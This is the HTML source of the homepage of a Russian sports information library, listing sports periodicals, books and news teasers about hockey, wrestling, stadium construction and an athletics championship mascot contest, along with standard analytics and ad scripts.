<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="RU" xmlns="http://www.w3.org/1999/xhtml" xmlns:nop="urn:schemas-mbsi-xslt:nop">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="Content-Language" content="ru" />
    <title>Библиотека международной спортивной информации</title>
    <meta name="description" content="Cамая большая база информации о всем спорте: футбол, хоккей, информация о водных спортивных событиях, атлетике, волейболе, баскетболе и всех остальных видах спорта." />
    <meta name="keywords" content="виды спорта, спортивные игры, спортивные события, спорт, архив спорта, футбол, хоккей, баскетбол, волейбол, биатлон, атлетика, бокс, гимнастика, акробатика" />
    <link rel="stylesheet" href="/stylesheets/summary/bmsi.css" type="text/css" media="screen" />
<!--[if IE 7]>
	<link rel="stylesheet" type="text/css" href="/temp/BmsiNew/stylesheets/screen-ie7.css" media="screen" />
<![endif]-->
<!--[if IE 6]>
	<link rel="stylesheet" type="text/css" href="/temp/BmsiNew/stylesheets/screen-ie6.css" media="screen" />
<![endif]-->
<!--[if IE 6]>
	<link rel="stylesheet" type="text/css" href="/temp/BmsiNew/stylesheets/highslide-ie6.css" media="screen" />
<![endif]--><script src="/scripts/summary/bmsi.js" type="text/javascript"></script><script src="/scripts/jquery/plugins/jquery.form.js" type="text/javascript"></script><script src="/scripts/jquery/plugins/jquery.treeview.js" type="text/javascript"></script><script src="/scripts/jquery/plugins/jquery.cookie.js" type="text/javascript"></script><script type="text/javascript">
			var _gaq = _gaq || [];  _gaq.push(['_setAccount', 'UA-11069063-1']);
			_gaq.push(['_setDomainName', '.bmsi.ru']);
			_gaq.push(['_trackPageview']);
			(function() {
				var ga = document.createElement('script');
				ga.type = 'text/javascript';
				ga.async = true;
				ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www')
					+ '.google-analytics.com/ga.js';
				var s = document.getElementsByTagName('script')[0];
				s.parentNode.insertBefore(ga, s);  
			})();
			jQuery(function(){
				var $ul = jQuery("ul", jQuery("div.expandable-new-on-site-list"));
				$ul.treeview({collapsed: true});
			});
			
		</script><script type="text/javascript">
			(function (d, w, c) {
			(w[c] = w[c] || []).push(function() {
			try {
			w.yaCounter18924148 = new Ya.Metrika({id:18924148,
			webvisor:true,
			clickmap:true,
			trackLinks:true,
			accurateTrackBounce:true});
			} catch(e) { }
			});

			var n = d.getElementsByTagName("script")[0],
			s = d.createElement("script"),
			f = function () { n.parentNode.insertBefore(s, n); };
			s.type = "text/javascript";
			s.async = true;
			s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

			if (w.opera == "[object Opera]") {
			d.addEventListener("DOMContentLoaded", f, false);
			} else { f(); }
			})(document, window, "yandex_metrika_callbacks");
		</script><noscript><div><img src="//mc.yandex.ru/watch/18924148" style="position:absolute; left:-9999px;" alt="" /></div></noscript><script src="http://tapnetwork.ru/js/2104.js" async="1"></script><link rel="SHORTCUT ICON" href="/content/BmsiNew/images/favicon.ico" /></head>
  <body>
    <div class="opera-fix">
      <div id="overlay"></div>
      <div id="header-wrap">
        <div id="header">
          <a id="logo" href="/">Библиотека Международной Спортивной Информации</a>
          <ul id="menu-main">
            <li>
              <a href="/periodic/" id="icon-periodic" title="Периодические издания">
					Периодические издания
				</a>
            </li>
            <li>
              <a href="/books/" id="icon-books" title="Книги">
					Книги
				</a>
            </li>
            <li>
              <a href="/articles/" id="icon-articles" title="Статьи">
					Статьи
				</a>
            </li>
            <li>
              <a href="/video/" id="icon-video" title="Видео">
					Видео
				</a>
            </li>
            <li>
              <a href="/catalogue/" id="icon-catalog" title="Каталог">
					Каталог
				</a>
            </li>
            <li>
              <a href="/projnews/" id="icon-help" title="Справка">
					Новости проекта
				</a>
            </li>
            <li>
              <a href="/partners/" id="icon-partner" title="Партнеры">
					Партнеры
				</a>
            </li>
            <li>
              <a href="/news/" id="icon-news" title="Новые поступления">
					Новые поступления
				</a>
            </li>
          </ul>
          <form id="search-form" action="/documents">
            <input type="text" name="Text" />
            <button type="submit">Искать</button>
            <ul>
              <li>
                <a href="" id="icon-construct" title="Поисковый запрос">"Конструктор" запросов</a>
              </li>
              <li>
                <a href="" id="icon-advanced" title="Расширенный поиск">Расширенный поиск</a>
              </li>
            </ul>
          </form>
        </div>
      </div>
      <div id="wrap">
        <div id="left-block">
          <div class="block" id="block-navigation">
            <h2>Разделы библиотеки</h2>
            <ul class="list">
              <li id="item-articles">
                <span class="arr"></span>
                <a href="/articles">Статьи</a>
                <div class="block">
                  <ul>
                    <li>
                      <a href="/articles/">
									Все статьи
								</a>
                    </li>
                    <li>
                      <a href="/articles/?DocumentTypeId=">
									Новости
								</a>
                    </li>
                    <li>
                      <a href="/articles/?DocumentTypeId=">
									Популярные статьи
								</a>
                    </li>
                    <li>
                      <a href="/articles/?DocumentTypeId=">
									Научные статьи
								</a>
                    </li>
                    <li>
                      <a href="/articles/?DocumentTypeId=">
									Нормативные акты
								</a>
                    </li>
                    <li>
                      <a href="/articles/?DocumentTypeId=">
									Правила / История
								</a>
                    </li>
                  </ul>
                </div>
              </li>
              <li id="item-video">
                <a href="/video">Видео</a>
              </li>
              <li id="item-periodic">
                <span class="arr"></span>
                <a href="/periodic">Периодические издания</a>
                <div class="block">
                  <ul>
                    <li>
                      <a href="/periodic">Все издания</a>
                    </li>
                    <li>
                      <a href="/periodic/?SourceTypeId=">
									Газеты
								</a>
                    </li>
                    <li>
                      <a href="/periodic/?SourceTypeId=">
									Журналы
								</a>
                    </li>
                    <li>
                      <a href="/periodic/?isElectronic=true">
									Электронные издания
								</a>
                    </li>
                  </ul>
                </div>
              </li>
              <li id="item-books">
                <span class="arr"></span>
                <a href="/books">Книги</a>
                <div class="block">
                  <ul>
                    <li>
                      <a href="/books">Все книги</a>
                    </li>
                    <li>
                      <a href="/books/?isElectronic=true">
									Электронные
								</a>
                    </li>
                  </ul>
                </div>
              </li>
              <li id="item-organizations">
                <span class="arr"></span>
                <a href="/sources/?SourceTypeId=,">
						Организации и сайты
					</a>
                <div class="block">
                  <ul>
                    <li>
                      <a href="/sites">
									Сайты
								</a>
                    </li>
                    <li>
                      <a href="/organizations">
									Организации
								</a>
                    </li>
                  </ul>
                </div>
              </li>
            </ul>
          </div>
          <div class="block" id="block-favs">
            <h2>Избранное</h2>
            <ul class="icons">
              <li>
                <a href="" class="icon-login" title="Вход">Вход</a>
              </li>
              <li>
                <a href="/user/new" class="icon-register" title="Регистрация">Регистрация</a>
              </li>
            </ul>
            <ul id="favorite-items" class="list inactive-list">
              <li id="item-issues">
                <a href="/issues/fav">Номера изданий</a>
              </li>
              <li id="item-documents">
                <a href="/documents/fav">Статьи</a>
              </li>
              <li id="item-sport">
                <a href="/documents/fav/sport">Виды спорта</a>
              </li>
              <li id="item-sources">
                <a href="/sources/fav">Источники</a>
              </li>
              <li id="item-categories">
                <a href="/documents/fav/cat">Рубрики</a>
              </li>
              <li id="item-regions" class="last">
                <a href="/documents/fav/region">Регионы</a>
              </li>
            </ul>
          </div>
        </div>
        <div id="content-wrap">
          <div id="content"><div id="central-carousel">
	<div id="central-carousel-top">
		<img alt="Предыдущее изображение" src="/temp/BmsiNew/images/central-carousel-previous.png" /></div>
	<div id="central-carousel-bottom">
		<img alt="Следующее изображение" src="/temp/BmsiNew/images/central-carousel-next.png" /></div>
	<div id="main-image-wrap">
		<div id="main-image">
			<a href="/source/7e30c6fd-77c8-4eef-b051-b83aae9c0008"><img src="/media/bmsi_carousel/bc8c35b0-ba07-4650-8487-f4fd7ac97ebf" /></a></div>
	</div>
	<ul>
		<li>
			<img alt="/media/bmsi_carousel/66d55135-de4d-4552-849c-17fbcb4e67fa" src="/media/bmsi_carousel_thumb/7dc82bf9-d961-45f7-9d43-b4f8debccfb1" title="/doc/sportreader" /></li>            
		<li>
			<img alt="/media/c0fcbf94-904c-4fe4-a0cf-3f697efe0977" src="/media/61b4940c-bf8d-4f1a-8c90-f0310f12de4e" title="/source/5667d260-998f-4eee-83b2-1002f2554fa5" /></li>            
		<li>        
			<img alt="/media/bmsi_carousel/bc8c35b0-ba07-4650-8487-f4fd7ac97ebf" src="/media/bmsi_carousel_thumb/bc8c35b0-ba07-4650-8487-f4fd7ac97ebf" title="/source/7e30c6fd-77c8-4eef-b051-b83aae9c0008" /></li>
            
		<li>
			<img alt="/media/6c7b55bc-143d-4637-b9e0-7bf5cb7c5769" src="/media/05c42606-aac0-41f5-aaa6-cedadf89a8bf" title="/source/7d42a65c-4055-4d75-9860-c24796dbe855" /></li>
            
		<li>
			<img alt="/media/69ccb618-740f-4f8f-8594-b171f209bbf9" src="/media/d39a8c14-da70-4366-8471-766332acf435" title="/source/844b2a17-d72d-47b8-8010-8924ae4aada7" /></li>
        <li>
			<img alt="/media/236b8ca8-646c-4e90-b1aa-2ee0bf791b35" src="/media/31f90567-3251-47b7-a639-93ed0cb9d360" title="http://www.s-bc.ru/" /></li>
	</ul>
</div><div class="block"><h2>Журналы, газеты<a href="/periodic/?mode=new" class="new">новые</a></h2><a href="/periodic" class="all">все</a><div class="scrollbar-c"><div class="scrollbar"><a class="prev" href=""></a><a class="next" href=""></a><div class="track"><div class="thumb"><span class="s-left"></span><span class="s-right"></span></div></div></div></div><div class="viewport"><div class="overview"><div class="papers" id="mine_papers_wrap"><div class="list-wrap" id="mine_list_wrap"><ul id="mine_list"><li class="active"><div><img src="/media/bmsi_thumb_small/65f121d2-61ff-421e-b205-acd63e22661a" alt="Вестник спортивных инноваций" /><div class="info"><h3><a href="/source/844b2a17-d72d-47b8-8010-8924ae4aada7">Вестник спортивных инноваций</a></h3><p><a href="/source/844b2a17-d72d-47b8-8010-8924ae4aada7"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/0b91ca42-464a-4f24-a067-914b3b65a7c8" alt="Футбол-Хоккей НН" /><div class="info"><h3><a href="/source/e4f5c21c-1966-4425-a2c2-0698855215a4">Футбол-Хоккей НН</a></h3><p><a href="/source/e4f5c21c-1966-4425-a2c2-0698855215a4"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/59d1f865-41ea-4ed8-a1b5-8e2a632f2196" alt="Независимая спортивная газета" /><div class="info"><h3><a href="/source/1a941875-2ac1-400e-bb90-f8954c9884bc">Независимая спортивная газета</a></h3><p><a href="/source/1a941875-2ac1-400e-bb90-f8954c9884bc"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/f47c11c1-1e11-43f9-b9b1-a93ab7459594" alt="Нижегородский спорт" /><div class="info"><h3><a href="/source/63eace86-2598-4939-bd32-3bb3d75ff17a">Нижегородский спорт</a></h3><p><a href="/source/63eace86-2598-4939-bd32-3bb3d75ff17a"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/3da510cd-5037-4f65-8989-b76c6f392c99" alt="Алтайский спорт" /><div class="info"><h3><a href="/source/9fef6e31-944f-4e53-8ee9-94909007e861">Алтайский спорт</a></h3><p><a href="/source/9fef6e31-944f-4e53-8ee9-94909007e861"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/e4354d01-7209-4d18-9671-733afc51f9d6" alt="Самозащита без оружия" /><div class="info"><h3><a href="/source/7d42a65c-4055-4d75-9860-c24796dbe855">Самозащита без оружия</a></h3><p><a href="/source/7d42a65c-4055-4d75-9860-c24796dbe855"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/2ffcb2d4-79bc-44b6-af8b-45f8307b02de" alt="Футбольный курьер" /><div class="info"><h3><a href="/source/194ccd39-0af4-4f2e-a8d2-a8d1e0797fb6">Футбольный курьер</a></h3><p><a href="/source/194ccd39-0af4-4f2e-a8d2-a8d1e0797fb6"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/373d9957-6561-4117-905a-ce32bccb1599" alt="Спортивная газета" /><div class="info"><h3><a href="/source/2a28570a-4a0d-4cf8-a3d0-c687d23b9f6b">Спортивная газета</a></h3><p><a href="/source/2a28570a-4a0d-4cf8-a3d0-c687d23b9f6b"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/b9d38391-af32-4ea6-88fa-8b2b26ad5cce" alt="Спорт-Регион" /><div class="info"><h3><a href="/source/d2e4273e-f540-4f61-8009-9dd66a783769">Спорт-Регион</a></h3><p><a href="/source/d2e4273e-f540-4f61-8009-9dd66a783769"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/b4361093-12df-4427-9a08-00c4c86f7330" alt="Чита спортивная (приложение к газете «Азия-Экспресс»)" /><div class="info"><h3><a href="/source/69cac0b0-b9cd-4c28-ad15-ebcb48e75297">Чита спортивная (приложение к газете «Азия-Экспресс»)</a></h3><p><a href="/source/69cac0b0-b9cd-4c28-ad15-ebcb48e75297"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/2f3ae65f-6200-4bc0-859d-5ced5806cdc9" alt="Олимп" /><div class="info"><h3><a href="/source/0712b55c-0fcb-4dcb-aa57-2fb17915c3ce">Олимп</a></h3><p><a href="/source/0712b55c-0fcb-4dcb-aa57-2fb17915c3ce"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/616c3006-288d-4419-85ea-1b9c8fc7c541" alt="Это спорт" /><div class="info"><h3><a href="/source/6821ee6b-1a8d-447a-a714-ed95e683f9db">Это спорт</a></h3><p><a href="/source/6821ee6b-1a8d-447a-a714-ed95e683f9db"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/ece45868-6116-464a-bdeb-2e57e2e82afc" alt="VIP спорт" /><div class="info"><h3><a href="/source/26d8f111-3262-46a0-a74f-2b926137b931">VIP спорт</a></h3><p><a href="/source/26d8f111-3262-46a0-a74f-2b926137b931"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/89ab134b-0192-4138-b4fa-25bebaceea4f" alt="Олимпийский вестник Юга России" /><div class="info"><h3><a href="/source/5f8c38e5-ff61-45ec-9b72-a6dc91871522">Олимпийский вестник Юга России</a></h3><p><a href="/source/5f8c38e5-ff61-45ec-9b72-a6dc91871522"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/92018f7e-e576-4c6b-b16d-021dab129b85" alt="Арена" /><div class="info"><h3><a href="/source/1fa13171-8cc5-47cd-b5d6-b47b42f8c98d">Арена</a></h3><p><a href="/source/1fa13171-8cc5-47cd-b5d6-b47b42f8c98d"></a></p></div></div></li></ul></div></div></div></div></div><div class="block"><h2>Книги, брошюры<a href="/books/?mode=new" class="new">новые</a></h2><a href="/books" class="all">все</a><div class="scrollbar-c"><div class="scrollbar"><a class="prev" href=""></a><a class="next" href=""></a><div class="track"><div class="thumb"><span class="s-left"></span><span class="s-right"></span></div></div></div></div><div class="viewport"><div class="overview"><div class="papers" id="mine_papers_wrap"><div class="list-wrap" id="mine_list_wrap"><ul id="mine_list"><li class="active"><div><img src="/media/bmsi_thumb_small/0d5b22a5-cc7b-44b7-815b-0c9b87509295" alt="Основы психорегуляции в спортивной деятельности" /><div class="info"><h3><a href="/source/fb67dd8b-0e43-4bb3-b50f-986c3d97f071">Основы психорегуляции в спортивной деятельности</a></h3><p><a href="/source/fb67dd8b-0e43-4bb3-b50f-986c3d97f071"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/e387cb49-cb98-4ed5-bdeb-6f566e2a94d8" alt="Психическая подготовка в теннисе" /><div class="info"><h3><a href="/source/e577b230-f895-47e0-a169-9a9a1e70a88d">Психическая подготовка в теннисе</a></h3><p><a href="/source/e577b230-f895-47e0-a169-9a9a1e70a88d"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/9d5018c8-9f99-40b0-9f13-fcbdf651d8be" alt="Психологическая подготовка спортсменов. Инновационные технологии" /><div class="info"><h3><a href="/source/d8ee265b-2728-47b0-8c19-9f356e9987fd">Психологическая подготовка спортсменов. Инновационные технологии</a></h3><p><a href="/source/d8ee265b-2728-47b0-8c19-9f356e9987fd"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/45b55bde-5988-4205-acd4-f036e6ff0b16" alt="Советы чемпиона" /><div class="info"><h3><a href="/source/58a18ac5-290f-490e-8190-a1ad5a74a879">Советы чемпиона</a></h3><p><a href="/source/58a18ac5-290f-490e-8190-a1ad5a74a879"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/9ebcf9a2-9a0c-4d26-ab9c-7eccd2a9bfd1" alt="Договорняк-2. Как покупают и продают матчи в российском футболе" /><div class="info"><h3><a href="/source/af5bb64f-c380-48f0-bfdb-a203a9b9a5da">Договорняк-2. Как покупают и продают матчи в российском футболе</a></h3><p><a href="/source/af5bb64f-c380-48f0-bfdb-a203a9b9a5da"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/c46640d4-916c-4493-9f5a-211f4fd932ba" alt="Психология и психогигиена в спорте" /><div class="info"><h3><a href="/source/ba2df438-30b9-448c-a633-ab82faa92958">Психология и психогигиена в спорте</a></h3><p><a href="/source/ba2df438-30b9-448c-a633-ab82faa92958"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/ec624783-1d1a-44e0-9041-46deb3e15048" alt="Мотопутешествия: Книга искателя приключений" /><div class="info"><h3><a href="/source/d72fa6df-3c3e-4610-99ac-b8ff9633f025">Мотопутешествия: Книга искателя приключений</a></h3><p><a href="/source/d72fa6df-3c3e-4610-99ac-b8ff9633f025"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/c85efcc2-2976-46e2-b01d-57cb3def1cf6" alt="Мяч летит в кольцо" /><div class="info"><h3><a href="/source/102715ff-d7d8-4fc1-8a44-c5acb3243489">Мяч летит в кольцо</a></h3><p><a href="/source/102715ff-d7d8-4fc1-8a44-c5acb3243489"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/45c7f59f-abb0-463e-a854-52275d92ca71" alt="Реабилитация и профилактика травм в адаптивном спорте" /><div class="info"><h3><a href="/source/b8f2d85f-165c-4f7d-b5dd-7249e3cf68a0">Реабилитация и профилактика травм в адаптивном спорте</a></h3><p><a href="/source/b8f2d85f-165c-4f7d-b5dd-7249e3cf68a0"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/cab48398-2a51-41a7-a396-3357ba5f0a60" alt="Профессионалы: Футбол против футбола" /><div class="info"><h3><a href="/source/d807f4b0-614f-40ca-91fb-7e2917f59b48">Профессионалы: Футбол против футбола</a></h3><p><a href="/source/d807f4b0-614f-40ca-91fb-7e2917f59b48"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/59b50cb2-7583-4fcc-947e-cc5d14f271a6" alt="Есть только один Дэвид Бекхэм" /><div class="info"><h3><a href="/source/b5008e96-1943-46da-8791-9d2a2800d6c5">Есть только один Дэвид Бекхэм</a></h3><p><a href="/source/b5008e96-1943-46da-8791-9d2a2800d6c5"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/57f95244-1e5f-4c56-81a2-319c60c19517" alt="Футбольный хулиган" /><div class="info"><h3><a href="/source/24959f6c-9423-4e81-ba35-a46a9352c257">Футбольный хулиган</a></h3><p><a href="/source/24959f6c-9423-4e81-ba35-a46a9352c257"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/6ac51515-ace2-4929-8427-298998c4790c" alt="Внимание глубина" /><div class="info"><h3><a href="/source/14c30b09-8069-474c-9b24-aad91115dd22">Внимание глубина</a></h3><p><a href="/source/14c30b09-8069-474c-9b24-aad91115dd22"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/58e8e551-f4a3-4400-a658-9bf89f420bfb" alt="Волейбол" /><div class="info"><h3><a href="/source/7d2e04f5-1d6b-41f5-84b7-b5cf0766bd06">Волейбол</a></h3><p><a href="/source/7d2e04f5-1d6b-41f5-84b7-b5cf0766bd06"></a></p></div></div></li><li><div><img src="/media/bmsi_thumb_small/20149efe-9fd0-4d40-8656-e6ec4417fe43" alt="Школа жизни" /><div class="info"><h3><a href="/source/76bdd35d-2d82-4a55-8217-c31be399dd1b">Школа жизни</a></h3><p><a href="/source/76bdd35d-2d82-4a55-8217-c31be399dd1b"></a></p></div></div></li></ul></div></div></div></div></div><div class="block"><h2>Мои издания</h2><div class="unregistered"><p>
							Чтобы пользоваться разделом «Мои издания»,<br />
							необходимо зайти или зарегистрироваться.
						</p><ul class="icons"><li><a href="" class="icon-login">Вход</a></li><li><a href="/user/new" class="icon-register">Регистрация</a></li></ul></div></div></div>
        </div>
        <div id="right-block">

							<div style="margin: 15px 0 10px 5px"> 
                            <style>
							#yap-Ya_sync_0-240x400, #yap-Ya_sync_0-240x400 .yap-fixed {
								width: 226px !important;
							}
							.yap-reset yatag td { 
								font-size: 75% !important;
							}
							</style>                           
                            <script type="text/javascript">
							yandex_partner_id = 132990;
							yandex_site_bg_color = 'FFFFFF';
							yandex_direct_bg_color  = 'FFFFFF';
							yandex_direct_header_bg_color  = 'FFFFFF';
							yandex_ad_format = 'direct';
							yandex_font_size = 0.8;
							yandex_font_family = 'arial';
							yandex_direct_type = 'vertical';
							yandex_direct_border_type = 'collapse';
							yandex_direct_limit = 4;
							yandex_direct_title_font_size = 2;
							yandex_direct_border_radius = true;
							yandex_direct_links_underline = true;
							yandex_direct_border_color = 'DDE2E8';
							yandex_direct_title_color = '385375';
							yandex_direct_url_color = '385375';
							yandex_direct_text_color = '3C536C';
							yandex_direct_hover_color = '385375';
							yandex_direct_sitelinks_color = '385375';
							yandex_direct_favicon = true;
							yandex_no_sitelinks = false;
							document.write('<scr'+'ipt type="text/javascript" src="//an.yandex.ru/system/context.js"></scr'+'ipt>');
							</script>
                            </div>
                            </div>
        <div id="block-news">
          <div class="halved-wrap-left">
            <div class="block clearfix">
              <h2>Отдельные статьи <a href="/articles/" class="all">все</a></h2>
              <div class="scrollbar-v">
                <div class="scrollbar">
                  <a class="prev" href=""></a>
                  <a class="next" href=""></a>
                  <div class="track">
                    <div class="thumb">
                      <span class="s-left"></span>
                      <span class="s-right"></span>
                    </div>
                  </div>
                </div>
              </div>
              <div class="viewport">
                <ul class="overview">
                  <li class="clearfix">
                    <img alt="Всероссийский турнир по хоккею среди юниоров ŠKODA JuniorIceHockeyCup откроется в Тольятти" src="/media/bmsi_thumb_medium/7b524687-dd2c-4fbc-9e51-433f376ca3f2" />
                    <a href="/doc/6f69165b-e986-425a-b352-53c74c9f7af3/" title="Всероссийский турнир по хоккею среди юниоров ŠKODA JuniorIceHockeyCup откроется в Тольятти" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/6f69165b-e986-425a-b352-53c74c9f7af3/" title="Всероссийский турнир по хоккею среди юниоров ŠKODA JuniorIceHockeyCup откроется в Тольятти">Всероссийский турнир по хоккею среди юниоров ŠKODA JuniorIceHockeyCup откроется в Тольятти</a>
                    </h3>
                    <p>
                      <a href="/doc/6f69165b-e986-425a-b352-53c74c9f7af3/" style="color:#000000; text-decoration:none;">5 сентября в рамках подготовки к XXII Олимпийским зимним играм 2014 года в Сочи стартует всероссийский турнир по хоккею - ŠKODA JuniorIceHockeyCup.</a>
                    </p>
                  </li>
                  <li class="clearfix">
                    <img alt="СИСТЕМА ПОДГОТОВКИ ПРЕПОДАВАТЕЛЕЙ ФИЗКУЛЬТУРЫ И ТРЕНЕРОВ В РОССИЙСКОЙ ИМПЕРИИ И В СССР&#xA;" src="/media/bmsi_thumb_medium/1a4b11b4-8c48-49dc-80a3-5d4bac342b17" />
                    <a href="/doc/2fa20132-0fcf-4a30-a5b3-953b1b1c64a5/" title="СИСТЕМА ПОДГОТОВКИ ПРЕПОДАВАТЕЛЕЙ ФИЗКУЛЬТУРЫ И ТРЕНЕРОВ В РОССИЙСКОЙ ИМПЕРИИ И В СССР&#xA;" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/2fa20132-0fcf-4a30-a5b3-953b1b1c64a5/" title="СИСТЕМА ПОДГОТОВКИ ПРЕПОДАВАТЕЛЕЙ ФИЗКУЛЬТУРЫ И ТРЕНЕРОВ В РОССИЙСКОЙ ИМПЕРИИ И В СССР&#xA;">СИСТЕМА ПОДГОТОВКИ ПРЕПОДАВАТЕЛЕЙ ФИЗКУЛЬТУРЫ И ТРЕНЕРОВ В РОССИЙСКОЙ ИМПЕРИИ И В СССР </a>
                    </h3>
                    <p>
                      <a href="/doc/2fa20132-0fcf-4a30-a5b3-953b1b1c64a5/" style="color:#000000; text-decoration:none;">Рассмотрена история физкультурного образования, изучена система подготовки преподавателей физического воспитания и преподавателей-тренеров   </a>
                    </p>
                  </li>
                  <li class="clearfix">
                    <img alt="Чемпионат и первенство России по борьбе «Корэш» в Казани" src="/media/bmsi_thumb_medium/4da7f4d4-4375-401a-9e44-d7799b50f2a5" />
                    <a href="/doc/862cee1a-eeec-485d-a2e7-6c5a22362544/" title="Чемпионат и первенство России по борьбе «Корэш» в Казани" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/862cee1a-eeec-485d-a2e7-6c5a22362544/" title="Чемпионат и первенство России по борьбе «Корэш» в Казани">Чемпионат и первенство России по борьбе «Корэш» в Казани</a>
                    </h3>
                    <p>
                      <a href="/doc/862cee1a-eeec-485d-a2e7-6c5a22362544/" style="color:#000000; text-decoration:none;"> 8 декабря в 12:00 во Дворце Единоборств «Ак Барс» (Казань, проспект Ф. Амирхана, д.1Г) пройдет торжественное открытие Чемпионата и первенства России по борьбе «Корэш». В торжественном открытии примут участие премьер-министр РТ Ильдар Халиков , президент Международной и Всероссийской федерации</a>
                    </p>
                  </li>
                  <li class="clearfix">
                    <img alt="Спортивные сооружения - ключевой фактор развития индустрии спорта" src="/media/bmsi_thumb_medium/21c85a5e-05ac-4497-ae3b-f21128ec232f" />
                    <a href="/doc/2ac937a9-15dc-4529-ab5e-268cc7239f33/" title="Спортивные сооружения - ключевой фактор развития индустрии спорта" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/2ac937a9-15dc-4529-ab5e-268cc7239f33/" title="Спортивные сооружения - ключевой фактор развития индустрии спорта">Спортивные сооружения - ключевой фактор развития индустрии спорта</a>
                    </h3>
                    <p>
                      <a href="/doc/2ac937a9-15dc-4529-ab5e-268cc7239f33/" style="color:#000000; text-decoration:none;">Российский спорт переживает в последнее время период серьезных преобразований и изменений. Можно объективно констатировать следующий факт: практически полностью исчерпаны потенциал и ресурсы великой советской спортивной державы. </a>
                    </p>
                  </li>
                  <li class="clearfix">
                    <img alt="Адьям Кузяев: «Будем играть для болельщика!»" src="/media/bmsi_thumb_medium/7a419348-103a-4ac2-9e52-b5a7981dd531" />
                    <a href="/doc/4a5b0cf3-e64d-4715-90d0-2122ef481fde/" title="Адьям Кузяев: «Будем играть для болельщика!»" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/4a5b0cf3-e64d-4715-90d0-2122ef481fde/" title="Адьям Кузяев: «Будем играть для болельщика!»">Адьям Кузяев: «Будем играть для болельщика!»</a>
                    </h3>
                    <p>
                      <a href="/doc/4a5b0cf3-e64d-4715-90d0-2122ef481fde/" style="color:#000000; text-decoration:none;">В межсезонье в «Карелии» сменился главный тренер. После ухода Сергея Дмитриева в «Петротрест» на пост наставника петрозаводчан был приглашён Адьям Кузяев.</a>
                    </p>
                  </li>
                  <li class="clearfix">
                    <img alt="«Строительство и дизайн стадионов и спортивных сооружений в России и СНГ»&#xA;" src="/media/bmsi_thumb_medium/bebebaae-1d56-46ba-95d0-0e97b519cc59" />
                    <a href="/doc/cd2d0541-6a18-47f1-9c70-084fa3d7fc32/" title="«Строительство и дизайн стадионов и спортивных сооружений в России и СНГ»&#xA;" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/cd2d0541-6a18-47f1-9c70-084fa3d7fc32/" title="«Строительство и дизайн стадионов и спортивных сооружений в России и СНГ»&#xA;">«Строительство и дизайн стадионов и спортивных сооружений в России и СНГ» </a>
                    </h3>
                    <p>
                      <a href="/doc/cd2d0541-6a18-47f1-9c70-084fa3d7fc32/" style="color:#000000; text-decoration:none;">ConstructionIQ представляет второй международный саммит "Строительство и дизайн стадионов и спортивных сооружений в России и СНГ", который пройдет в Варшаве, Польша, 22-24 октября 2012 года, при информационной поддержке журнала «Строительство и эксплуатация строительных сооружений»</a>
                    </p>
                  </li>
                  <li class="clearfix">
                    <img alt="Объявлен конкурс на выбор официального талисмана Чемпионата мира ИААФ по легкой атлетике 2013!" src="/media/bmsi_thumb_medium/6ce8c63e-a220-461d-aaf6-ec5ed1856566" />
                    <a href="/doc/2a55d083-d971-4716-839b-f09b7bdeb5ab/" title="Объявлен конкурс на выбор официального талисмана Чемпионата мира ИААФ по легкой атлетике 2013!" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/2a55d083-d971-4716-839b-f09b7bdeb5ab/" title="Объявлен конкурс на выбор официального талисмана Чемпионата мира ИААФ по легкой атлетике 2013!">Объявлен конкурс на выбор официального талисмана Чемпионата мира ИААФ по легкой атлетике 2013!</a>
                    </h3>
                    <p>
                      <a href="/doc/2a55d083-d971-4716-839b-f09b7bdeb5ab/" style="color:#000000; text-decoration:none;">Агентство спортивного маркетинга Sport Media Group при содействии Всероссийской федерации легкой атлетики объявляет конкурс на выбор официального талисмана Чемпионата мира ИААФ по легкой атлетике 2013, который пройдет с 10 по 18 августа 2013 года в Москве!</a>
                    </p>
                  </li>
                  <li class="clearfix">
